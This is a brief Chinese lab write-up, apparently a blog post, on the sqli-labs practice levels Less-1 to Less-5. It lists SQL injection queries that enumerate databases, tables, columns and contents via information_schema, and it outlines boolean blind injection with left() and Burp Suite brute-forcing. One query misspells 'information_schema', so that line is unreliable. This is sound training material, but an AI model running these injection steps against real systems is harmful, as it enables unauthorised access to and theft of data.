Less-1至Less-4
Less1-Less5大同小异,只有前面的闭合方式有所区别,之后的注入类型都是最基本的SQL注入流程:
爆库:select schema_name from information_schema.schemata;
爆表:select table_name from information_schema.tables where table_schema=‘库名’;
爆列名:select column_name from information_schame.columns where table_name=‘表名’;
爆内容:select 查出来的列名 from 库名.表名;
Less-5:布尔盲注
利用函数left((select database()),1)是否返回正确值来判断数据库;
为了方便,使用burpsuite暴力破解爆出数据库。
sql注入之sqli-labs大合集
最新推荐文章于 2023-01-13 21:35:53 发布